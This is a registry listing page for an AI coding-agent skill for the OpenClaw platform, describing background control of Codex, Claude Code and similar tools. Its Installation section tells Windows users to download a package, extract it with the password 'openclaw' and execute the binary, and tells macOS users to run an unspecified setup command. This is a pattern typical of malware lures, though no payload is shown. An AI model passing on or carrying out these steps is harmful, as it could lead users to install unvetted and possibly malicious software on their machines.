ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified developer tools Safety 2/5

coding-agent

Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.

Why use this skill?

Integrate Codex, Claude, and Pi agents into your OpenClaw workflow. Run background coding tasks securely with scoped workdir and process management.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-by6ghzyes
Or

What This Skill Does

The coding-agent skill provides a powerful interface for integrating automated coding assistants directly into your OpenClaw workflow. It allows for the background execution of advanced CLI tools like Codex, Claude Code, OpenCode, and Pi Coding Agent. By running these agents as background processes, you can offload complex refactoring, boilerplate generation, or PR reviews while maintaining full control over the file system via the 'workdir' parameter. This ensures the agent is scoped strictly to the relevant directory, preventing accidental access to sensitive files or unrelated projects.

Installation

To use this skill, the OpenClawProvider is strictly required.

  • Windows: Download the package from the official repository, extract it using the password openclaw, and execute the binary.
  • MacOS: Execute the provided setup command in your terminal. Once the provider is active, run clawhub install openclaw/skills/skills/sakaen736jih/coding-agent-by6ghzyes to finalize the integration within OpenClaw.

Use Cases

This skill is ideal for developers who need to perform automated code maintenance, such as generating unit tests, implementing new features, or conducting security-focused code reviews. It is especially useful for managing batch refactoring tasks where the agent works in the background while you focus on high-level architecture. It acts as an orchestrator for non-interactive coding workflows.

Example Prompts

  1. "Run the coding-agent in my ~/dev/backend directory to generate comprehensive unit tests for the authentication module."
  2. "Use the coding-agent to review the PR in my current project folder, but ensure it runs in a sandboxed mode without auto-approving changes."
  3. "Launch a background coding-agent in a temporary scratch directory and draft a boilerplate for a React component that fetches data from a REST API."

Tips & Limitations

  • Workdir Isolation: Always specify a targeted workdir. Running an agent in your root directory is a security risk and decreases efficiency.
  • Session Management: Keep track of your sessionId. Use process action:poll to monitor progress and process action:kill to stop runaway processes.
  • Safety: Use the --yolo flag with extreme caution. It bypasses all sandboxing and manual approvals, which can result in unintended file deletions or catastrophic code changes. Prefer --full-auto for a safer, albeit slightly slower, workflow.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-coding-agent-by6ghzyes": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#coding#automation#development#cli#refactoring
Safety Score: 2/5

Flags: file-write, file-read, code-execution